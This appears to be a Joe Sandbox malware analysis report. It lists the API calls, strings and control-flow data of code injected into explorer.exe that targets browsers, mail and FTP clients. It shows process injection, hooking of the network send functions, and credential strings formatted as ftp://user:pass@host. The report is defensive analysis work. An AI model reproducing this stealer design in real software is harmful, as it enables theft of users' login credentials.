                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00141038
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0014106B
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00141074
                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00141010), ref: 0014107A
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001410DF
                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 001410FE
                                                                                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0014111A
                                                                                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0014112E
                                                                                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00141142
                                                                                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00141156
                                                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00141166
                                                                                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0014117A
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0014118E
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 001411A2
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 001411B6
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 001411CA
                                                                                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 001411DE
                                                                                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 001411F2
                                                                                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00141206
                                                                                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00141216
                                                                                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00141226
                                                                                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00141236
                                                                                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00141246
                                                                                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00141256
                                                                                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00141266
                                                                                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00141276
                                                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001412B4
                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0014130B
                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0014131C
                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00141327
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                        • API String ID: 2555639992-1680033604
                                                                                                                                        • Opcode ID: 9ebffd15af1fb84f2b066f1aea75f627a1c18bd0377867ed2e46894a787be723
                                                                                                                                        • Instruction ID: dc542a9a0b42b0944d1a2474cfaa35a1e40aba12b5a802184d131ad2958b39a5
                                                                                                                                        • Opcode Fuzzy Hash: 9ebffd15af1fb84f2b066f1aea75f627a1c18bd0377867ed2e46894a787be723
                                                                                                                                        • Instruction Fuzzy Hash: F571B170600345BBCB10EFB09C45E6E7BACBF46B80B040629FD50C34B0EB74EA858A74
                                                                                                                                        Function 001410A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203stringsleepprocessCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00142861: GetProcessHeap.KERNEL32(00000008,0000A000,001410CC), ref: 00142864
                                                                                                                                          • Part of subcall function 00142861: RtlAllocateHeap.NTDLL(00000000), ref: 0014286B
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001410DF
                                                                                                                                        • Process32First.KERNEL32(00000000,?), ref: 001410FE
                                                                                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0014111A
                                                                                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0014112E
                                                                                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00141142
                                                                                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00141156
                                                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00141166
                                                                                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0014117A
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0014118E
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 001411A2
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 001411B6
                                                                                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 001411CA
                                                                                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 001411DE
                                                                                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 001411F2
                                                                                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00141206
                                                                                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00141216
                                                                                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00141226
                                                                                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00141236
                                                                                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00141246
                                                                                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00141256
                                                                                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00141266
                                                                                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00141276
                                                                                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001412B4
                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0014130B
                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0014131C
                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00141327
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                        • API String ID: 3950187957-1680033604
                                                                                                                                        • Opcode ID: c816813c7adb3d35ce144508629c96746254682e23a2ec5d0317ce6e8e176bc6
                                                                                                                                        • Instruction ID: 92e79ddbca890a2d2786162cc7844398bee06be632409996d1ea31b17ee11237
                                                                                                                                        • Opcode Fuzzy Hash: c816813c7adb3d35ce144508629c96746254682e23a2ec5d0317ce6e8e176bc6
                                                                                                                                        • Instruction Fuzzy Hash: 8C515071604309B7DB10DFB18D85E6E7AEC7F45B80B580A29FE50C30B0EB65EA858A75
                                                                                                                                        Function 00147728 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 112 147728-147745 113 14790d 112->113 114 14774b-147758 112->114 113->113 115 14776a-14776f 114->115 116 147771 115->116 117 147760-147765 116->117 118 147773 116->118 119 147766-147768 117->119 120 147778-14777a 118->120 119->115 119->116 121 147783-147787 120->121 122 14777c-147781 120->122 121->120 123 147789 121->123 122->121 124 147794-147799 123->124 125 14778b-147792 123->125 126 1477a8-1477aa 124->126 127 14779b-1477a4 124->127 125->120 125->124 130 1477b3-1477b7 126->130 131 1477ac-1477b1 126->131 128 1477a6 127->128 129 14781a-14781d 127->129 128->126 132 147822-147825 129->132 133 1477c0-1477c2 130->133 134 1477b9-1477be 130->134 131->130 135 147827-147829 132->135 136 1477e4-1477f3 133->136 137 1477c4 133->137 134->133 135->132 140 14782b-14782e 135->140 138 147804-147811 136->138 139 1477f5-1477fc 136->139 141 1477c5-1477c7 137->141 138->138 143 147813-147815 138->143 139->139 142 1477fe 139->142 140->132 144 147830-14784c 140->144 145 1477d0-1477d4 141->145 146 1477c9-1477ce 141->146 142->119 143->119 144->135 147 14784e 144->147 145->141 148 1477d6 145->148 146->145 151 147854-147858 147->151 149 1477e1 148->149 150 1477d8-1477df 148->150 149->136 150->141 150->149 152 14789f-1478a2 151->152 153 14785a-147870 LoadLibraryA 151->153 154 1478a5-1478ac 152->154 155 147871-147876 153->155 157 1478d0-147900 VirtualProtect * 2 154->157 158 1478ae-1478b0 154->158 155->151 156 147878-14787a 155->156 159 147883-147890 GetProcAddress 156->159 160 14787c-147882 156->160 163 147904-147908 157->163 161 1478b2-1478c1 158->161 162 1478c3-1478ce 158->162 164 147892-147897 159->164 165 147899-14789c 159->165 160->159 161->154 162->161 163->163 166 14790a 163->166 164->155 166->113
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000146000.00000040.80000000.00040000.00000000.sdmp, Offset: 00146000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_146000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 137774317c78c2343cdd1fbb4f4123f72b7bb64e5b5728ad2df89d4dde990e6c
                                                                                                                                        • Instruction ID: 473bfa96a7add21fbd4edf95bbf6db1a07cc53cb79d84f7aac3d4cde3a6bea16
                                                                                                                                        • Opcode Fuzzy Hash: 137774317c78c2343cdd1fbb4f4123f72b7bb64e5b5728ad2df89d4dde990e6c
                                                                                                                                        • Instruction Fuzzy Hash: D5513B7194C3924FD7228A78CC986B07BA0DB52321B6D0779D5E5CB3E6E7945C06C7A0
                                                                                                                                        Function 00142861 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 167 142861-142871 GetProcessHeap RtlAllocateHeap
                                                                                                                                        APIs
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,001410CC), ref: 00142864
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0014286B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1357844191-0
                                                                                                                                        • Opcode ID: 83665a0c9bdd05d867ba3f2e8a9fa44248d15ce0034d7404760f248a4ede80eb
                                                                                                                                        • Instruction ID: da79892938d1183c4cd3308817a686e1e8b5606c7a56a63013c37fed521d63fe
                                                                                                                                        • Opcode Fuzzy Hash: 83665a0c9bdd05d867ba3f2e8a9fa44248d15ce0034d7404760f248a4ede80eb
                                                                                                                                        • Instruction Fuzzy Hash: C7A012744001007FDD542BE0AC0DF053A18A742301F0003007119C6470C96001CC8721

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00141819 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208injectionnativesleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00142608: VirtualQuery.KERNEL32(00144434,?,0000001C), ref: 00142615
                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 0014184E
                                                                                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00141889
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00141919
                                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00143428,00000016), ref: 00141940
                                                                                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00141968
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00141978
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00141992
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0014199A
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001419A8
                                                                                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001419AF
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 001419C5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 001419CC
                                                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001419E2
                                                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00141A0C
                                                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00141A1F
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00141A26
                                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00141A2D
                                                                                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00141A41
                                                                                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00141A58
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00141A65
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00141A6B
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00141A71
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00141A74
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                        • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                                        • API String ID: 1066286714-4141090125
                                                                                                                                        • Opcode ID: 7ca1087d7f885aa60bce7ecbd8176a92638bc5c4ee142ad821ccf18374b4b0d9
                                                                                                                                        • Instruction ID: d213af5b04e23453ef856ba7aa912d67d7e7efffac0b042e39c84af5b6bff1e9
                                                                                                                                        • Opcode Fuzzy Hash: 7ca1087d7f885aa60bce7ecbd8176a92638bc5c4ee142ad821ccf18374b4b0d9
                                                                                                                                        • Instruction Fuzzy Hash: A6619B75205344BFD310DF609C84E6BBBECEF8A754F100628F95993261DB70DE848BA2
                                                                                                                                        Function 0014263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0014265A
                                                                                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00142672
                                                                                                                                        • lstrlen.KERNEL32(?,00000000), ref: 0014267A
                                                                                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00142685
                                                                                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0014269F
                                                                                                                                        • wsprintfA.USER32 ref: 001426B6
                                                                                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 001426CF
                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 001426D9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                        • String ID: %02X
                                                                                                                                        • API String ID: 3341110664-436463671
                                                                                                                                        • Opcode ID: 2ba4dcbbf5db0ee3cd15a42d8a12275f4f7f2d88b60a4ea101a2d6d296bd7cfa
                                                                                                                                        • Instruction ID: d181832de22b54d8d24d3374460cb541158c151d3415ba5ea6b50291050ee5a4
                                                                                                                                        • Opcode Fuzzy Hash: 2ba4dcbbf5db0ee3cd15a42d8a12275f4f7f2d88b60a4ea101a2d6d296bd7cfa
                                                                                                                                        • Instruction Fuzzy Hash: 25113AB5900108BFDB119B95EC88EAEBFBCEB49741F104165FA15E3160D7718F819B60
                                                                                                                                        Function 00141B17 Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 421 141b17-141b2c 422 141b60-141b68 421->422 423 141b2e 421->423 425 141bc3-141bcb 422->425 426 141b6a-141b6f 422->426 424 141b30-141b5e RtlMoveMemory 423->424 424->422 424->424 428 141bcd-141bdf 425->428 429 141c0b 425->429 427 141bbe-141bc1 426->427 427->425 431 141b71-141b84 LoadLibraryA 427->431 428->429 432 141be1-141bfe LdrProcessRelocationBlock 428->432 430 141c0d-141c12 429->430 433 141c15-141c17 431->433 434 141b8a-141b8f 431->434 432->429 435 141c00-141c04 432->435 433->430 436 141bb6-141bb9 434->436 435->429 437 141c06-141c09 435->437 438 141b91-141b95 436->438 439 141bbb 436->439 437->429 437->432 440 141b97-141b9a 438->440 441 141b9c-141b9f 438->441 439->427 442 141ba1-141bab GetProcAddress 440->442 441->442 442->433 443 141bad-141bb3 442->443 443->436
                                                                                                                                        APIs
                                                                                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00141B4E
                                                                                                                                        • LoadLibraryA.KERNEL32(?,00144434,00000000,00000000,74DF2EE0,00000000,00141910,?,?,?,00000001,?,00000000), ref: 00141B76
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00141BA3
                                                                                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00141BF4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3827878703-0
                                                                                                                                        • Opcode ID: 72474349364c06638ae8f695e113f6ddad86092f3a651f00259beae5cd2e4790
                                                                                                                                        • Instruction ID: f793cc3edc0696430600652cbcd282d48b27a5ba3f044a22af7ba9d7d70ff106
                                                                                                                                        • Opcode Fuzzy Hash: 72474349364c06638ae8f695e113f6ddad86092f3a651f00259beae5cd2e4790
                                                                                                                                        • Instruction Fuzzy Hash: 5131AF75700216BBCB28CF29CC84B76B7E8FF16315B15456CE896CB620E731E885CBA0
                                                                                                                                        Function 00141332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94libraryloadersleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00142861: GetProcessHeap.KERNEL32(00000008,0000A000,001410CC), ref: 00142864
                                                                                                                                          • Part of subcall function 00142861: RtlAllocateHeap.NTDLL(00000000), ref: 0014286B
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0014109E,?,00141010), ref: 0014134A
                                                                                                                                        • GetCurrentProcessId.KERNEL32(00000003,?,0014109E,?,00141010), ref: 0014135B
                                                                                                                                        • wsprintfA.USER32 ref: 00141372
                                                                                                                                          • Part of subcall function 0014263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0014265A
                                                                                                                                          • Part of subcall function 0014263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00142672
                                                                                                                                          • Part of subcall function 0014263E: lstrlen.KERNEL32(?,00000000), ref: 0014267A
                                                                                                                                          • Part of subcall function 0014263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00142685
                                                                                                                                          • Part of subcall function 0014263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0014269F
                                                                                                                                          • Part of subcall function 0014263E: wsprintfA.USER32 ref: 001426B6
                                                                                                                                          • Part of subcall function 0014263E: CryptDestroyHash.ADVAPI32(?), ref: 001426CF
                                                                                                                                          • Part of subcall function 0014263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 001426D9
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00141389
                                                                                                                                        • GetLastError.KERNEL32 ref: 0014138F
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 001413A1
                                                                                                                                          • Part of subcall function 001424D5: GetCurrentProcessId.KERNEL32 ref: 001424E7
                                                                                                                                          • Part of subcall function 001424D5: GetCurrentThreadId.KERNEL32 ref: 001424EF
                                                                                                                                          • Part of subcall function 001424D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001424FF
                                                                                                                                          • Part of subcall function 001424D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0014250D
                                                                                                                                          • Part of subcall function 001424D5: CloseHandle.KERNEL32(00000000), ref: 00142566
                                                                                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 001413B8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 001413BF
                                                                                                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 001413E4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 001413EB
                                                                                                                                          • Part of subcall function 00141DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00141E1D
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0014141D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                                        • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                                        • API String ID: 706757162-1430290102
                                                                                                                                        • Opcode ID: 0a98ea725bea3003754e3ea209afc7936c85b17fa5c89cbcecb2d6eea557c1aa
                                                                                                                                        • Instruction ID: 6a734d277bc1ae49f39d41a44111d6d36205040c18d28d51ba9185124c59cec4
                                                                                                                                        • Opcode Fuzzy Hash: 0a98ea725bea3003754e3ea209afc7936c85b17fa5c89cbcecb2d6eea557c1aa
                                                                                                                                        • Instruction Fuzzy Hash: 8D31B934340214BBCB106FA0DD0AF5E3B65EF16B41F144124F91A976B1CFB59AD18B90
                                                                                                                                        Function 00141647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91stringnetworkCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 235 141647-14165a 236 141660-141662 235->236 237 141748-14174f 235->237 236->237 238 141668-14166b 236->238 238->237 239 141671-14167d lstrlen 238->239 240 141747 239->240 241 141683-14168a lstrlen 239->241 240->237 241->240 242 141690-1416a8 getpeername 241->242 242->240 243 1416ae-1416ca inet_ntoa htons 242->243 243->240 244 1416cc-1416d4 243->244 245 1416d6-1416d9 244->245 246 141708 244->246 248 1416f3-1416f8 245->248 249 1416db-1416de 245->249 247 14170d-14173c call 142861 wsprintfA call 1424ae 246->247 247->240 259 14173e-141745 call 142843 247->259 248->247 251 1416e0-1416e3 249->251 252 141701-141706 249->252 254 1416e5-1416ea 251->254 255 1416fa-1416ff 251->255 252->247 254->248 257 1416ec-1416f1 254->257 255->247 257->240 257->248 259->240
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                                                                                                        • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                                                                                                        • API String ID: 3379139566-1703351401
                                                                                                                                        • Opcode ID: e01b895f3cb4c8f518917d6ec7e52af745ce42f75a5473e6ca936f11c3cb22e2
                                                                                                                                        • Instruction ID: db5f62e2d4cdbb4247cd267900a8d64229033cc69c20dde4a6c11c00b31fb8b2
                                                                                                                                        • Opcode Fuzzy Hash: e01b895f3cb4c8f518917d6ec7e52af745ce42f75a5473e6ca936f11c3cb22e2
                                                                                                                                        • Instruction Fuzzy Hash: 0121F47AE00209BBDF105FBD8D889BE7EA9AB45302B084075E814E3231DB74CE809B60
                                                                                                                                        Function 00141752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 267 141752-141774 GetModuleHandleA GetProcAddress 268 141776-1417c0 RtlZeroMemory * 4 267->268 269 1417c1-1417c6 267->269 268->269
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00141539,?,?,?,0014144B,?), ref: 00141763
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0014176A
                                                                                                                                        • RtlZeroMemory.NTDLL(00144228,00000104), ref: 00141788
                                                                                                                                        • RtlZeroMemory.NTDLL(00144118,00000104), ref: 00141790
                                                                                                                                        • RtlZeroMemory.NTDLL(00144330,00000104), ref: 00141798
                                                                                                                                        • RtlZeroMemory.NTDLL(00144000,00000104), ref: 001417A1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_16_2_141000_explorer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryZero$AddressHandleModuleProc
                                                                                                                                        • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                                                                                                        • API String ID: 1490332519-278825019
